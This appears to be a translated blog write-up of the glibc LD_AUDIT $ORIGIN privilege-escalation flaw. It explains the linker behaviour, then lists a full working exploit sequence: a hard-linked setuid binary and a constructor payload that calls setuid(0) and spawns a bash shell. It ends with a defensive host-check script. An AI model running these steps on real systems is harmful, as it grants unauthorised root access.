1. Terminology
The GNU C Library: The GNU C Library project provides the core libraries for the GNU system and GNU/Linux systems, as well as many other systems that use Linux as the kernel. These libraries provide critical APIs including ISO C11, POSIX.1-2008, BSD, OS-specific APIs and more. These APIs include such foundational facilities as open, read, write, malloc, printf, getaddrinfo, dlopen, pthread_create, crypt, login, exit and more.
The GNU C Library is designed to be a backwards compatible, portable, and high performance ISO C library. It aims to follow all relevant standards including ISO C11, POSIX.1-2008, and IEEE 754-2008.
2. How the vulnerability works
For obvious reasons, the dynamic linker will ignore requests to preload user
specified libraries for setuid/setgid programs. However, it is possible to
imagine legitimate use cases for this functionality, so the glibc developers
provide an exception to this rule.
LD_PRELOAD
A whitespace-separated list of additional, user-specified ELF (an executable file format)
shared libraries to be loaded before all others (that is, preloaded). This can be
used to selectively override functions in other shared
libraries. For set-user-ID/set-group-ID ELF binaries, only
libraries in the standard search directories that are also set-
user-ID will be loaded.
In order to be preloaded during the execution of a privileged program, a
library must be setuid and in the trusted library search path. This is a
reasonable design: before a library will be loaded, the system administrator
must brand that library as safe to load across privilege boundaries.
This feature allows developers who design their programs to operate safely
while running as setuid to opt in to doing so. Bizarrely, the same conditions
do not apply to LD_AUDIT (a user-specified list of ELF shared objects to be loaded before all others, in a separate linker namespace), which will load an arbitrary DSO, regardless of
whether it has been designed to operate safely or not.
While the dynamic loader will only use a library that exports the dynamic
symbols required by the rtld-auditing API (the auditing API for the dynamic linker), it must first dlopen() the
library in order to examine the exported symbols. By definition, this must
execute any defined initialization routines.
This confusion can be exploited by locating a DSO in the trusted search path with
initialization code that has not been designed to operate safely while euid !=
uid. See the Notes section below for additional discussion on this topic.
--------------------
Affected Software
------------------------
At least the following versions have been tested
2.12.1, FC13
2.5, RHEL5-6 / CentOS5-6
2.11.1, Ubuntu 10
EDB Note: 2.7, Debian 5
Some term explanations: glibc notes on ld.so (canpool's blog, CSDN)
3. Exploitation
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target        # create a hard link to the setuid binary, named target
exec 3< /tmp/exploit/target             # open target on file descriptor 3 so the inode stays referenced
ls -l /proc/$$/fd/3                     # inspect the open descriptor
rm -rf /tmp/exploit/                    # delete the directory
ls -l /proc/$$/fd/3                     # the descriptor now shows the path as deleted
cat > payload.c

#include <stdlib.h>
#include <unistd.h>

/* constructor: runs automatically when the shared object is loaded */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}

cat payload.c                           # if the content is missing or wrong, run vi payload.c to fix it in vim
gcc -w -fPIC -shared -o /tmp/exploit payload.c
ls -l /tmp/exploit
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
This is the end of the command sequence.
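A host check, added here and not part of the original post: it tests the two preconditions the steps above depend on, an installed glibc from the versions the post lists as tested, and a setuid/setgid binary that has extra hard links (the hard link into /tmp/exploit is what creates that state), plus whether the kernel's fs.protected_hardlinks knob is on. The function names are mine.

```shell
#!/bin/sh
# Added defensive check (not from the original post). It looks for the
# preconditions the steps above rely on rather than reproducing them.

# Return 0 if VERSION is one of the glibc versions the post lists as tested.
is_listed_vulnerable() {
    case "$1" in
        2.5|2.7|2.11.1|2.12.1) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the installed glibc version, e.g. "2.35" (getconf first, ldd as fallback).
installed_glibc_version() {
    v=$(getconf GNU_LIBC_VERSION 2>/dev/null | awk '{print $2}')
    [ -n "$v" ] || v=$(ldd --version 2>/dev/null | awk 'NR==1 {print $NF}')
    printf '%s\n' "$v"
}

# Print setuid/setgid regular files below DIR that have more than one hard link.
# A privileged binary reachable through an extra link in a user-writable
# directory is the state the hard-link step above produces.
find_linked_privileged() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -links +1 2>/dev/null
}

# Return 0 if fs.protected_hardlinks is enabled (non-owners cannot hard-link
# setuid binaries); return 1 if it is off or the kernel lacks the knob.
hardlinks_protected() {
    [ "$(cat /proc/sys/fs/protected_hardlinks 2>/dev/null)" = "1" ]
}

# Summarise the three checks; DIR defaults to /tmp.
report() {
    dir=${1:-/tmp}
    v=$(installed_glibc_version)
    if is_listed_vulnerable "$v"; then
        echo "glibc $v: in the post's tested-vulnerable list"
    else
        echo "glibc $v: not in the post's list (check your vendor's advisory)"
    fi
    hardlinks_protected && echo "fs.protected_hardlinks=1" || echo "fs.protected_hardlinks off or absent"
    echo "setuid/setgid files with extra hard links under $dir:"
    find_linked_privileged "$dir"
}
```

Source the script and run `report /tmp` (or another user-writable directory) as a normal user.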